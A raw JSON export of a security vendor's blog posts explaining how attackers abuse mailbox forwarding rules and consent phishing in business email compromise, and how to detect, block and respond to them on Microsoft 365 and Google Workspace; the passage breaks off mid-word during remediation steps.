oftware-how-should-security-adapt.json","blog/saas-has-changed-how-we-adopt-software-how-should-security-adapt",{"_path":317227,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":317228,"ogImage":118,"summary":317231,"title":317242,"subtitle":118,"metaTitle":317243,"synopsis":317244,"hashTags":118,"publishedDate":317245,"slug":317246,"tagsCollection":317247,"relatedBlogPostsCollection":317253,"authorsCollection":318430,"content":318434,"_id":318864,"_type":5439,"_source":5440,"_file":318865,"_stem":318866,"_extension":5439},"/blog/half-of-account-compromise-attacks-included-malicious-mail-rules",{"id":317229,"publishedAt":317230},"4QpaYHe4risfUfjgl13a5q","2025-04-28T18:10:35.840Z",{"json":317232},{"data":317233,"content":317234,"nodeType":165},{},[317235],{"data":317236,"content":317237,"nodeType":178},{},[317238],{"data":317239,"marks":317240,"value":317241,"nodeType":173},{},[],"Attackers routinely use mail rules to exfiltrate sensitive data and get persistent access to victim accounts. \n","Half of account compromise attacks included malicious mail rules","Account compromise attacks: 50% include malicious mail rules","Attackers routinely use mail rules to hide their attacks, exfiltrate sensitive data, and to get persistent access to victim accounts. \n","2023-06-06T00:00:00.000Z","half-of-account-compromise-attacks-included-malicious-mail-rules",{"items":317248},[317249,317251],{"sys":317250,"name":505},{"id":504},{"sys":317252,"name":509},{"id":508},{"items":317254},[317255,317615,317952],{"__typename":1528,"sys":317256,"content":317257,"title":317594,"synopsis":317595,"hashTags":317596,"publishedDate":317603,"slug":317604,"tagsCollection":317605,"authorsCollection":317611},{"id":289406},{"json":317258},{"nodeType":165,"data":317259,"content":317260},{},[317261,317268,317274,317281,317300,317328,317335,317418,317437,317440,317447,317465,317472,317479,317482,317489,317533,317540,317556,317563,317566,317573,317579],{"nodeType":178,"data":317262,"content":317263},{},[317264],{"nodeType":173,"value":317265,"marks":317266,"data":317267},"Mail rules are a handy feature found in most email clients. You might have used them to forward emails to your teammates while you’re off sipping Piña coladas, or to move incoming email from that spammy colleague to the ‘don’t read’ folder.",[],{},{"nodeType":312,"data":317269,"content":317273},{"target":317270},{"sys":317271},{"id":317272,"type":317,"linkType":318},"7xLVXoCCjansV1u50e2pbM",[],{"nodeType":178,"data":317275,"content":317276},{},[317277],{"nodeType":173,"value":317278,"marks":317279,"data":317280},"Sadly for us defenders, they’re just as useful for attackers. After gaining access to a victim's account, attackers will often create a mail rule inside their mailbox as a way to maintain stealthy access. This mail rule can do anything a normal mail rule could but is usually used to forward emails matching sensitive keywords, like ‘invoice’ or ‘payment’, to an external email address controlled by the attacker.",[],{},{"nodeType":3769,"data":317282,"content":317283},{},[317284],{"nodeType":178,"data":317285,"content":317286},{},[317287,317291,317296],{"nodeType":173,"value":317288,"marks":317289,"data":317290},"This gives the ",[],{},{"nodeType":173,"value":317292,"marks":317293,"data":317295},"attacker persistent access to the mailbox",[317294],{"type":370},{},{"nodeType":173,"value":317297,"marks":317298,"data":317299},". Even if the victim's password is changed, they turn on MFA, or their workstation is completely rebuilt - as long as the rule stays in place, it remains effective.",[],{},{"nodeType":178,"data":317301,"content":317302},{},[317303,317307,317315,317319,317324],{"nodeType":173,"value":317304,"marks":317305,"data":317306},"As another example, in ",[],{},{"nodeType":186,"data":317308,"content":317310},{"uri":317309},"https://www.reddit.com/r/sysadmin/comments/6l63x6/malicious_outlook_rules/",[317311],{"nodeType":173,"value":22819,"marks":317312,"data":317314},[317313],{"type":194},{},{"nodeType":173,"value":317316,"marks":317317,"data":317318}," the author describes how mail rules were used to ",[],{},{"nodeType":173,"value":317320,"marks":317321,"data":317323},"delete ",[317322],{"type":1646},{},{"nodeType":173,"value":317325,"marks":317326,"data":317327},"any emails the affected user received from the company’s Chief Finance Officer (CFO) so that the attacker could pretend to be the CFO, sending them fake emails to convince them to transfer out company funds.",[],{},{"nodeType":178,"data":317329,"content":317330},{},[317331],{"nodeType":173,"value":317332,"marks":317333,"data":317334},"Business Email Compromise (BEC) like this is the most popular type of attack at the moment, causing damages well into the billions according to the FBI. Here are just a few publicly documented breaches involving mail rules:",[],{},{"nodeType":250,"data":317336,"content":317337},{},[317338,317358,317378,317398],{"nodeType":254,"data":317339,"content":317340},{},[317341],{"nodeType":178,"data":317342,"content":317343},{},[317344,317347,317355],{"nodeType":173,"value":37,"marks":317345,"data":317346},[],{},{"nodeType":186,"data":317348,"content":317350},{"uri":317349},"https://www.sans.org/dataincident2020",[317351],{"nodeType":173,"value":317352,"marks":317353,"data":317354},"SANS: 28,000 PII records lost",[],{},{"nodeType":173,"value":37,"marks":317356,"data":317357},[],{},{"nodeType":254,"data":317359,"content":317360},{},[317361],{"nodeType":178,"data":317362,"content":317363},{},[317364,317367,317375],{"nodeType":173,"value":37,"marks":317365,"data":317366},[],{},{"nodeType":186,"data":317368,"content":317370},{"uri":317369},"https://www.ic3.gov/Media/News/2020/201204.pdf",[317371],{"nodeType":173,"value":317372,"marks":317373,"data":317374},"FBI report: BEC involving malicious mail rules costs company $175k",[],{},{"nodeType":173,"value":37,"marks":317376,"data":317377},[],{},{"nodeType":254,"data":317379,"content":317380},{},[317381],{"nodeType":178,"data":317382,"content":317383},{},[317384,317387,317395],{"nodeType":173,"value":37,"marks":317385,"data":317386},[],{},{"nodeType":186,"data":317388,"content":317390},{"uri":317389},"https://www.reddit.com/r/Office365/comments/ej0wkx/hacker_created_forwarding_rules_for_users_account/",[317391],{"nodeType":173,"value":317392,"marks":317393,"data":317394},"Reddit thread: Hacker created forwarding rule for user's account",[],{},{"nodeType":173,"value":10557,"marks":317396,"data":317397},[],{},{"nodeType":254,"data":317399,"content":317400},{},[317401],{"nodeType":178,"data":317402,"content":317403},{},[317404,317407,317415],{"nodeType":173,"value":37,"marks":317405,"data":317406},[],{},{"nodeType":186,"data":317408,"content":317410},{"uri":317409},"https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/",[317411],{"nodeType":173,"value":317412,"marks":317413,"data":317414},"Microsoft case study of BEC operation using mail rules",[],{},{"nodeType":173,"value":37,"marks":317416,"data":317417},[],{},{"nodeType":178,"data":317419,"content":317420},{},[317421,317425,317433],{"nodeType":173,"value":317422,"marks":317423,"data":317424},"You can read ",[],{},{"nodeType":186,"data":317426,"content":317428},{"uri":317427},"/blog/case-study-business-email-compromise-bec-attack-nearly-cost-us-millions/",[317429],{"nodeType":173,"value":317430,"marks":317431,"data":317432},"this case study",[],{},{"nodeType":173,"value":317434,"marks":317435,"data":317436}," of a how a real Business Email Compromise (BEC) attack played out at an engineering firm that we interviewed.",[],{},{"nodeType":231,"data":317438,"content":317439},{},[],{"nodeType":169,"data":317441,"content":317442},{},[317443],{"nodeType":173,"value":317444,"marks":317445,"data":317446},"How likely is this to actually happen?",[],{},{"nodeType":178,"data":317448,"content":317449},{},[317450,317453,317461],{"nodeType":173,"value":37,"marks":317451,"data":317452},[],{},{"nodeType":186,"data":317454,"content":317456},{"uri":317455},"https://attack.mitre.org/techniques/T1114/003/",[317457],{"nodeType":173,"value":317458,"marks":317459,"data":317460},"MITRE lists threat groups",[],{},{"nodeType":173,"value":317462,"marks":317463,"data":317464}," that have been known to use mail rules in this way as part of targeted attacks. However, most often, this technique is used opportunistically.",[],{},{"nodeType":178,"data":317466,"content":317467},{},[317468],{"nodeType":173,"value":317469,"marks":317470,"data":317471},"Attackers run phishing campaigns containing thousands of harvested emails from multiple companies. A classic scenario is to trick a user into logging in to a fake Office 365 or Google Workspace login screen, stealing their credentials. Those credentials are then used to create a malicious mail rule inside the compromised user's mailbox. For scale and speed, this process is completely automated.",[],{},{"nodeType":178,"data":317473,"content":317474},{},[317475],{"nodeType":173,"value":317476,"marks":317477,"data":317478},"Similarly a mail rule could be created automatically as the result of a user’s workstation becoming infected with malware.",[],{},{"nodeType":231,"data":317480,"content":317481},{},[],{"nodeType":169,"data":317483,"content":317484},{},[317485],{"nodeType":173,"value":317486,"marks":317487,"data":317488},"How to defend against this type of attack?",[],{},{"nodeType":178,"data":317490,"content":317491},{},[317492,317496,317504,317508,317518,317521,317530],{"nodeType":173,"value":317493,"marks":317494,"data":317495},"The first step is to check your mailboxes to make sure no malicious mail rules have already been created. On Office 365, this will require rolling some PowerShell; on Google Workspace, you'll need to query the APIs (we discuss some detail of these options ",[],{},{"nodeType":186,"data":317497,"content":317499},{"uri":317498},"/blog/should-you-disable-external-email-auto-forwarding/",[317500],{"nodeType":173,"value":317501,"marks":317502,"data":317503},"in this post",[],{},{"nodeType":173,"value":317505,"marks":317506,"data":317507},"). Or you can save yourself some pain and use the free tool linked above, which we built for this very purpose. If you find rules that don't look right, follow these guides for what to do next on ",[],{},{"nodeType":1698,"data":317509,"content":317513},{"target":317510},{"sys":317511},{"id":317512,"type":317,"linkType":318},"e4805bba-2531-4250-bdcc-ab996dd33519",[317514],{"nodeType":173,"value":317515,"marks":317516,"data":317517},"Office 365",[],{},{"nodeType":173,"value":1464,"marks":317519,"data":317520},[],{},{"nodeType":1698,"data":317522,"content":317526},{"target":317523},{"sys":317524},{"id":317525,"type":317,"linkType":318},"50dab356-e78b-479d-ad45-a07b898b5ec4",[317527],{"nodeType":173,"value":211147,"marks":317528,"data":317529},[],{},{"nodeType":173,"value":1477,"marks":317531,"data":317532},[],{},{"nodeType":178,"data":317534,"content":317535},{},[317536],{"nodeType":173,"value":317537,"marks":317538,"data":317539},"It's also possible to stop users from creating auto-forwarding rules altogether. If no one is using the feature, this is probably a good idea - you might as well reduce risk. However, there are plenty of situations where teams benefit from the automation and efficiency mail rules bring. Security works best when it enables the business to work securely, rather than constraining it - leaving the feature available whilst managing the risk through detection is a good option as well.",[],{},{"nodeType":178,"data":317541,"content":317542},{},[317543,317547,317553],{"nodeType":173,"value":317544,"marks":317545,"data":317546},"We discuss more about the pros and cons of disabling mail rules and some options for some security controls you can implement so that you can keep them enabled ",[],{},{"nodeType":186,"data":317548,"content":317549},{"uri":317498},[317550],{"nodeType":173,"value":139178,"marks":317551,"data":317552},[],{},{"nodeType":173,"value":1477,"marks":317554,"data":317555},[],{},{"nodeType":178,"data":317557,"content":317558},{},[317559],{"nodeType":173,"value":317560,"marks":317561,"data":317562},"If you'd like, try Push for free and we'll spot any suspicious mail rules, then work with employees to make sure the mail rule wasn't something they created for a legitimate use. If they haven't, we'll notify you to take action and investigate a potential incident. Find out more here.",[],{},{"nodeType":231,"data":317564,"content":317565},{},[],{"nodeType":169,"data":317567,"content":317568},{},[317569],{"nodeType":173,"value":18605,"marks":317570,"data":317572},[317571],{"type":370},{},{"nodeType":178,"data":317574,"content":317575},{},[317576],{"nodeType":173,"value":69741,"marks":317577,"data":317578},[],{},{"nodeType":178,"data":317580,"content":317581},{},[317582,317585,317591],{"nodeType":173,"value":61741,"marks":317583,"data":317584},[],{},{"nodeType":186,"data":317586,"content":317587},{"uri":98320},[317588],{"nodeType":173,"value":1472,"marks":317589,"data":317590},[],{},{"nodeType":173,"value":1477,"marks":317592,"data":317593},[],{},"Email security: How hackers use mail rules to access your inbox","After phishing campaigns target Office 365 and Google Workspace users, malicious mail rules are automatically added to the user’s mailbox. Take steps to defend.",[317597,317598,317599,317600,317601,317602],"businessemailcompromise","bec","mailrules","office365","googleworkspace","emailsecurity","2021-06-10T00:00:00.000+01:00","email-security-how-hackers-use-mail-rules-to-access-your-inbox",{"items":317606},[317607,317609],{"sys":317608,"name":505},{"id":504},{"sys":317610,"name":509},{"id":508},{"items":317612},[317613],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":317614},{"url":19129},{"__typename":1528,"sys":317616,"content":317618,"title":317937,"synopsis":317938,"hashTags":317939,"publishedDate":317940,"slug":317941,"tagsCollection":317942,"authorsCollection":317948},{"id":317617},"roVnr9Z2sHDPGtemZUE7u",{"json":317619},{"data":317620,"content":317621,"nodeType":165},{},[317622,317641,317648,317677,317693,317700,317707,317714,317722,317729,317749,317756,317776,317782,317790,317797,317817,317825,317844,317852,317859,317912,317919,317926,317931],{"data":317623,"content":317624,"nodeType":178},{},[317625,317629,317637],{"data":317626,"marks":317627,"value":317628,"nodeType":173},{},[],"Mail rules can be abused by attackers to get stealthy, persistent access to a mailbox, leak data and facilitate high-impact Business Email Compromise (",{"data":317630,"content":317632,"nodeType":186},{"uri":317631},"/blog/email-security-how-hackers-use-mail-rules-to-access-your-inbox/",[317633],{"data":317634,"marks":317635,"value":317636,"nodeType":173},{},[],"read more here",{"data":317638,"marks":317639,"value":317640,"nodeType":173},{},[],"). So, lots of organisations decide to ban external auto-forwarding of email altogether. The question is, is this a good move?",{"data":317642,"content":317643,"nodeType":235},{},[317644],{"data":317645,"marks":317646,"value":317647,"nodeType":173},{},[],"This is damage limitation, not prevention",{"data":317649,"content":317650,"nodeType":178},{},[317651,317655,317660,317664,317673],{"data":317652,"marks":317653,"value":317654,"nodeType":173},{},[],"It’s important to recognise that adding a malicious mail rule to a user’s mailbox is a ",{"data":317656,"marks":317657,"value":317659,"nodeType":173},{},[317658],{"type":370},"post-compromise activity",{"data":317661,"marks":317662,"value":317663,"nodeType":173},{},[],". That is, an attacker has already compromised the victim somehow - compromised their password, deployed malware on their machine, performed consent phishing etc. - they already have access to their mailbox. At this point, you should assume all data in the mailbox is compromised anyway. (See here for “",{"data":317665,"content":317668,"nodeType":1698},{"target":317666},{"sys":317667},{"id":317512,"type":317,"linkType":318},[317669],{"data":317670,"marks":317671,"value":317672,"nodeType":173},{},[],"what to do if I find a malicious mail rule?",{"data":317674,"marks":317675,"value":317676,"nodeType":173},{},[],"”)",{"data":317678,"content":317679,"nodeType":178},{},[317680,317684,317689],{"data":317681,"marks":317682,"value":317683,"nodeType":173},{},[],"Preventing external auto-forwarding rules therefore reduces",{"data":317685,"marks":317686,"value":317688,"nodeType":173},{},[317687],{"type":370}," further potential impact",{"data":317690,"marks":317691,"value":317692,"nodeType":173},{},[]," to a compromised account - worth doing if no one is using the feature, but what if your users are?",{"data":317694,"content":317695,"nodeType":235},{},[317696],{"data":317697,"marks":317698,"value":317699,"nodeType":173},{},[],"Security vs. user experience",{"data":317701,"content":317702,"nodeType":178},{},[317703],{"data":317704,"marks":317705,"value":317706,"nodeType":173},{},[],"Good security should enable a business and its users to work securely rather than constrain it. Controls that restrict users’ productivity or are seen as a nuisance will be bypassed and although you might prevent a potential attack type, you’ll ultimately cause less secure behaviour from your users.",{"data":317708,"content":317709,"nodeType":178},{},[317710],{"data":317711,"marks":317712,"value":317713,"nodeType":173},{},[],"With that in mind, if external auto-forwarding of email is something your users need - and there are plenty of legitimate scenarios where this may be the case - you should be considering how to manage the risk, rather than eliminate it. The good news is this is totally doable. Equally, if none, or most of your users don’t need this feature, you should of course disable it to reduce your overall risk.",{"data":317715,"content":317716,"nodeType":178},{},[317717],{"data":317718,"marks":317719,"value":317721,"nodeType":173},{},[317720],{"type":370},"Managing the risk on Exchange Online for Microsoft 365 through detection alone",{"data":317723,"content":317724,"nodeType":178},{},[317725],{"data":317726,"marks":317727,"value":317728,"nodeType":173},{},[],"Managing the risk of external auto-forwarding email rules means making sure you’re alerted when one is created. ",{"data":317730,"content":317731,"nodeType":178},{},[317732,317736,317745],{"data":317733,"marks":317734,"value":317735,"nodeType":173},{},[],"If you’re using Exchange Online for Microsoft 365, ",{"data":317737,"content":317739,"nodeType":186},{"uri":317738},"https://protection.office.com/alertpolicies",[317740],{"data":317741,"marks":317742,"value":317744,"nodeType":173},{},[317743],{"type":194},"an informational alert policy",{"data":317746,"marks":317747,"value":317748,"nodeType":173},{},[]," - “Creation of forwarding/redirect rule” - can be enabled so alerts of this type of suspicious rules will be sent to tenant admins when they are created in future. ",{"data":317750,"content":317751,"nodeType":178},{},[317752],{"data":317753,"marks":317754,"value":317755,"nodeType":173},{},[],"/prod",{"data":317757,"content":317758,"nodeType":178},{},[317759,317763,317772],{"data":317760,"marks":317761,"value":317762,"nodeType":173},{},[],"The downside of this approach is it isn’t possible to look retrospectively (",{"data":317764,"content":317766,"nodeType":186},{"uri":317765},"https://gcits.com/knowledge-base/find-inbox-rules-forward-mail-externally-office-365-powershell/",[317767],{"data":317768,"marks":317769,"value":317771,"nodeType":173},{},[317770],{"type":194},"without using PowerShell",{"data":317773,"marks":317774,"value":317775,"nodeType":173},{},[],") so alerts will only fire on future creation of forwarding rules. Additionally, alerts also fire for internal forwarding rules which can generate a lot of noise when looking specifically for malicious rules. ",{"data":317777,"content":317781,"nodeType":312},{"target":317778},{"sys":317779},{"id":317780,"type":317,"linkType":318},"2aafjsTsqy7ljL5hh8c3MO",[],{"data":317783,"content":317784,"nodeType":178},{},[317785],{"data":317786,"marks":317787,"value":317789,"nodeType":173},{},[317788],{"type":370},"Managing the risk on Exchange Online for Microsoft 365  through detection & prevention",{"data":317791,"content":317792,"nodeType":178},{},[317793],{"data":317794,"marks":317795,"value":317796,"nodeType":173},{},[],"In addition to being alerted when rules are created, you can take steps to either disallow external auto-forwarding rules altogether, or prevent them taking effect. You might think disallowing their creation is better but if you can permit creation but stop them from taking effect, you keep a high-fidelity detection of account compromise, without adding any additional risk.",{"data":317798,"content":317799,"nodeType":178},{},[317800,317804,317813],{"data":317801,"marks":317802,"value":317803,"nodeType":173},{},[],"In Exchange Online for Microsoft 365, you can achieve this with ",{"data":317805,"content":317807,"nodeType":186},{"uri":317806},"https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/external-email-forwarding?view=o365-worldwide",[317808],{"data":317809,"marks":317810,"value":317812,"nodeType":173},{},[317811],{"type":194},"outbound spam filter policies",{"data":317814,"marks":317815,"value":317816,"nodeType":173},{},[]," to automatically stop any emails auto-forwarded out of your organisation. If an attacker creates a malicious auto-forwarding rule, any forwarded mail will be blocked by the spam filter; if you have your alerts set up correctly, you’ll still receive an alert about the new malicious rule.",{"data":317818,"content":317819,"nodeType":178},{},[317820],{"data":317821,"marks":317822,"value":317824,"nodeType":173},{},[317823],{"type":370},"Managing the risk on Gmail for Google Workspace",{"data":317826,"content":317827,"nodeType":178},{},[317828,317832,317841],{"data":317829,"marks":317830,"value":317831,"nodeType":173},{},[],"Google Workspace only allows complete prevention, such that your users (and attackers) are not able to create forwarding settings. If you decide that is right for you, you can disable automatic forwarding entirely by ",{"data":317833,"content":317835,"nodeType":186},{"uri":317834},"https://support.google.com/a/answer/2491924?hl=en",[317836],{"data":317837,"marks":317838,"value":317840,"nodeType":173},{},[317839],{"type":194},"following these instructions",{"data":317842,"marks":317843,"value":1477,"nodeType":173},{},[],{"data":317845,"content":317846,"nodeType":178},{},[317847],{"data":317848,"marks":317849,"value":317851,"nodeType":173},{},[317850],{"type":370},"Managing the risk using the Push platform",{"data":317853,"content":317854,"nodeType":178},{},[317855],{"data":317856,"marks":317857,"value":317858,"nodeType":173},{},[],"Using the Push platform makes managing this risk a lot easier with less of your time:",{"data":317860,"content":317861,"nodeType":250},{},[317862,317872,317882,317892,317902],{"data":317863,"content":317864,"nodeType":254},{},[317865],{"data":317866,"content":317867,"nodeType":178},{},[317868],{"data":317869,"marks":317870,"value":317871,"nodeType":173},{},[],"Connect your platform with a few clicks and we’ll sweep your estate for any suspicious rules currently in place.",{"data":317873,"content":317874,"nodeType":254},{},[317875],{"data":317876,"content":317877,"nodeType":178},{},[317878],{"data":317879,"marks":317880,"value":317881,"nodeType":173},{},[],"Get alerts via email or ChatOps (Slack or Teams) when new rules are created. Triage and deal with them directly from the email or chat platform.",{"data":317883,"content":317884,"nodeType":254},{},[317885],{"data":317886,"content":317887,"nodeType":178},{},[317888],{"data":317889,"marks":317890,"value":317891,"nodeType":173},{},[],"Use our ChatOps features to ask users directly if they recognise a rule when you’re unsure. You can even automate this so user feedback is already collected by the time you come to triage.",{"data":317893,"content":317894,"nodeType":254},{},[317895],{"data":317896,"content":317897,"nodeType":178},{},[317898],{"data":317899,"marks":317900,"value":317901,"nodeType":173},{},[],"Disable rules directly from the platform for quick response.",{"data":317903,"content":317904,"nodeType":254},{},[317905],{"data":317906,"content":317907,"nodeType":178},{},[317908],{"data":317909,"marks":317910,"value":317911,"nodeType":173},{},[],"Follow our detailed and clear guides for how to respond comprehensively.",{"data":317913,"content":317914,"nodeType":178},{},[317915],{"data":317916,"marks":317917,"value":40632,"nodeType":173},{},[317918],{"type":370},{"data":317920,"content":317921,"nodeType":178},{},[317922],{"data":317923,"marks":317924,"value":317925,"nodeType":173},{},[],"If your users don’t use external email auto-forwarding, it makes sense to prevent the feature to limit the impact of a malicious mail rule. However, if there are legitimate business reasons for keeping the feature active, this risk can be sufficiently managed through detection.",{"data":317927,"content":317930,"nodeType":312},{"target":317928},{"sys":317929},{"id":209109,"type":317,"linkType":318},[],{"data":317932,"content":317933,"nodeType":178},{},[317934],{"data":317935,"marks":317936,"value":37,"nodeType":173},{},[],"Should you disable external email auto-forwarding?","External email auto-forwarding is a feature but also a risk; learn whether you should disable it, and, if you can't, how to manage the risk through detection.",[317597,317598,317599,317600,317601],"2021-06-03T00:00:00.000+01:00","should-you-disable-external-email-auto-forwarding",{"items":317943},[317944,317946],{"sys":317945,"name":505},{"id":504},{"sys":317947,"name":509},{"id":508},{"items":317949},[317950],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":317951},{"url":19129},{"__typename":1528,"sys":317953,"content":317954,"title":288168,"synopsis":318418,"hashTags":118,"publishedDate":318419,"slug":288169,"tagsCollection":318420,"authorsCollection":318426},{"id":274110},{"json":317955},{"data":317956,"content":317957,"nodeType":165},{},[317958,317966,317974,317996,318004,318025,318032,318038,318045,318052,318059,318066,318073,318080,318087,318094,318101,318107,318114,318121,318128,318135,318153,318159,318166,318172,318179,318185,318192,318199,318206,318249,318256,318276,318283,318373,318393,318399,318406,318412],{"data":317959,"content":317960,"nodeType":178},{},[317961],{"data":317962,"marks":317963,"value":317965,"nodeType":173},{},[317964],{"type":1646},"You get a call from your CFO: “Jenkins! ACME just called to find out why we haven’t paid invoices for the last 3 months? Didn’t you make payment last week?”",{"data":317967,"content":317968,"nodeType":178},{},[317969],{"data":317970,"marks":317971,"value":317973,"nodeType":173},{},[317972],{"type":1646},"You think back a bit. “Yip! I received another invoice a few days ago and made payment yesterday. I also paid the contractor doing renovations on your house. By the way, congrats on the new kitchen.”",{"data":317975,"content":317976,"nodeType":178},{},[317977,317981,317992],{"data":317978,"marks":317979,"value":317980,"nodeType":173},{},[],"Many companies have had similar incidents occur over the last couple of years - it’s a classic ",{"data":317982,"content":317986,"nodeType":1698},{"target":317983},{"sys":317984},{"id":317985,"type":317,"linkType":318},"pj2eLZXa4PyrY1DD4NCHt",[317987],{"data":317988,"marks":317989,"value":317991,"nodeType":173},{},[317990],{"type":194},"Business Email Compromise",{"data":317993,"marks":317994,"value":317995,"nodeType":173},{},[]," (BEC) scenario. An attacker managed to gain access to Jenkins in accounting’s email and intercepted email from legitimate creditors, replacing their banking details with the attacker's own, and even forging invoices from non-existent suppliers. Forged emails are then sent from the CEO or CFO to approve the payments.",{"data":317997,"content":317998,"nodeType":178},{},[317999],{"data":318000,"marks":318001,"value":318003,"nodeType":173},{},[318002],{"type":1646},"But how did they manage to gain access to the account? Our security team enforced multi-factor authentication (MFA) a few weeks ago. We’re supposed to be secure!?",{"data":318005,"content":318006,"nodeType":178},{},[318007,318011,318021],{"data":318008,"marks":318009,"value":318010,"nodeType":173},{},[],"As detailed in our ",{"data":318012,"content":318015,"nodeType":1698},{"target":318013},{"sys":318014},{"id":269414,"type":317,"linkType":318},[318016],{"data":318017,"marks":318018,"value":318020,"nodeType":173},{},[318019],{"type":194},"blog post about consent phishing",{"data":318022,"marks":318023,"value":318024,"nodeType":173},{},[],", this attack method will bypass MFA, since the paired malicious third-party integration app (sometimes called OAuth) generates an authentication token. MFA checks are only applied when logging in with your username and password, so in this case, the attacker was able to get a valid access token into Jenkins’ account. ",{"data":318026,"content":318027,"nodeType":178},{},[318028],{"data":318029,"marks":318030,"value":318031,"nodeType":173},{},[],"While this isn’t necessarily the same level of access provided with a username/password combo, it might be, based on the scopes Jenkins granted the third-party integration app access to when they clicked ‘Accept’. ",{"data":318033,"content":318037,"nodeType":312},{"target":318034},{"sys":318035},{"id":318036,"type":317,"linkType":318},"5BIHqq49jJOHsEHLgc8Tb9",[],{"data":318039,"content":318040,"nodeType":178},{},[318041],{"data":318042,"marks":318043,"value":318044,"nodeType":173},{},[],"The list of third-party integration scopes can include anything from relatively benign things like retrieving your name, surname, and email address, to more dangerous or excessive permissions such as full access to your mailbox, the ability to configure mail rules to forward or delete email, and full access to your OneDrive or Sharepoint files. Worse case scenario: if you belong to groups with password reset capabilities, the attacker may be able to perform full account takeovers.",{"data":318046,"content":318047,"nodeType":235},{},[318048],{"data":318049,"marks":318050,"value":318051,"nodeType":173},{},[],"How do you detect and respond to such incidents?",{"data":318053,"content":318054,"nodeType":178},{},[318055],{"data":318056,"marks":318057,"value":318058,"nodeType":173},{},[],"The main issue is detection. In my experience as an incident responder working with Fortune 500 companies at MWR Infosecurity, I found that BEC attacks are usually detected when associated parties start asking questions about non-payment (or unrecognized payments), which can take weeks or months from the day of compromise. By this point your cloud provider’s logs are likely to have rolled over and you’re unlikely to find much useful information to populate your incident timeline.",{"data":318060,"content":318061,"nodeType":178},{},[318062],{"data":318063,"marks":318064,"value":318065,"nodeType":173},{},[],"Shameless plug alert: Push’s ChatOps functionality can greatly assist here as it detects such malicious rules when created, and sends a message to the owner of the account (Jenkins) asking if they created the rule. Sometimes a user will have a legitimate use for creating mail rules to forward messages to another account, and this allows them to acknowledge the rule and mark it as safe. In case they didn’t create it, they can flag it as such and this will cause an alert to be sent to their security team. This is practically instant detection and invaluable when preventing fraudulent payments. And getting input from the account owner cuts way down on alert fatigue for your team.",{"data":318067,"content":318068,"nodeType":235},{},[318069],{"data":318070,"marks":318071,"value":318072,"nodeType":173},{},[],"\nMitigate the attack \n",{"data":318074,"content":318075,"nodeType":178},{},[318076],{"data":318077,"marks":318078,"value":318079,"nodeType":173},{},[],"Once you’ve detected the incident, your next step is to remediate. Typically, this would require someone on the  security team to find the offending rule in your cloud provider’s control panel to disable it, which can take some time, depending on the team’s availability and other factors. ",{"data":318081,"content":318082,"nodeType":178},{},[318083],{"data":318084,"marks":318085,"value":318086,"nodeType":173},{},[],"Detecting the creation of malicious mail rules would require you to configure policies and alerts in your cloud provider’s control panel, and requires someone from the security team to monitor for notifications. If your IT person is also responsible for security in your organization, it’s unlikely that they would spend an appropriate amount of time looking at alerts and, in many cases, would need to follow up with employees to confirm if they had indeed created the rules. If you’re a larger organization, your dedicated security person will likely have higher priority tasks, too.",{"data":318088,"content":318089,"nodeType":178},{},[318090],{"data":318091,"marks":318092,"value":318093,"nodeType":173},{},[],"Discovering a breach is usually related to someone noticing unrecognized payments, vendors querying a lack of payments, or phishing emails being sent to fellow employees or contacts outside of your organization. If an attacker is careful to avoid causing too much interruption, then it’s likely that you won’t discover the breach until all the damage has been done. Usually by this point, performing an investigation will reveal very little due to important investigation artifacts disappearing due to logs rolling over.",{"data":318095,"content":318096,"nodeType":178},{},[318097],{"data":318098,"marks":318099,"value":318100,"nodeType":173},{},[],"If you’re using Push, we would automatically detect the mail rule, talk to the employee whose email the mail rule was created within, and if they didn’t set the mail rule up themselves, we would assume it was created by an attacker and alert your security team. Push’s ChatOps will disable the offending rule and mark it as suspicious.",{"data":318102,"content":318106,"nodeType":312},{"target":318103},{"sys":318104},{"id":318105,"type":317,"linkType":318},"6rV4EiwTgmBsmYEaUvv55b",[],{"data":318108,"content":318109,"nodeType":178},{},[318110],{"data":318111,"marks":318112,"value":318113,"nodeType":173},{},[],"If this were a typical credential compromise scenario, the account’s password would be reset and everyone would go about their lives. However, since no credentials were compromised in our example, you’d go onto the next step to…",{"data":318115,"content":318116,"nodeType":235},{},[318117],{"data":318118,"marks":318119,"value":318120,"nodeType":173},{},[],"Remove the app’s permissions and revoke the tokens",{"data":318122,"content":318123,"nodeType":178},{},[318124],{"data":318125,"marks":318126,"value":318127,"nodeType":173},{},[],"As I mentioned earlier, third-party integration apps generate tokens, which can be valid for an hour to sometimes 24 hours or more, depending on the integrating app, how it is being used, and if it makes use of refresh tokens.",{"data":318129,"content":318130,"nodeType":178},{},[318131],{"data":318132,"marks":318133,"value":318134,"nodeType":173},{},[],"Invalidating third-party integration access permissions requires accessing your cloud provider’s control panel. In this example, you need to revoke access for a malicious app in a Microsoft 365 tenant. Microsoft’s guidance on this is very useful, but unfortunately not as simple as just pressing a button.",{"data":318136,"content":318137,"nodeType":178},{},[318138,318142,318149],{"data":318139,"marks":318140,"value":318141,"nodeType":173},{},[],"To view Microsoft’s recommendations for dealing with a malicious app, you’d need to navigate to the ",{"data":318143,"content":318144,"nodeType":186},{"uri":270424},[318145],{"data":318146,"marks":318147,"value":270427,"nodeType":173},{},[318148],{"type":194},{"data":318150,"marks":318151,"value":318152,"nodeType":173},{},[]," section in Azure, and locate the app by searching for its name or Application ID, which can be found in the Push app’s OAuth integrations page. In the app menu, click on ‘Permissions,’ then ‘Review permissions.’ ",{"data":318154,"content":318158,"nodeType":312},{"target":318155},{"sys":318156},{"id":318157,"type":317,"linkType":318},"5Z6T2anRIJ1he2phTbcFot",[],{"data":318160,"content":318161,"nodeType":178},{},[318162],{"data":318163,"marks":318164,"value":318165,"nodeType":173},{},[],"On the slide-out menu, select “This application is malicious and I’m compromised.”",{"data":318167,"content":318171,"nodeType":312},{"target":318168},{"sys":318169},{"id":318170,"type":317,"linkType":318},"2lGnKdKTjXAVYBiOtYrbEl",[],{"data":318173,"content":318174,"nodeType":178},{},[318175],{"data":318176,"marks":318177,"value":318178,"nodeType":173},{},[],"This will provide you with pre-generated PowerShell scripts to 1) Remove all users assigned to the application, 2) Revoke all permissions granted to the application, and 3) Revoke refresh tokens for all 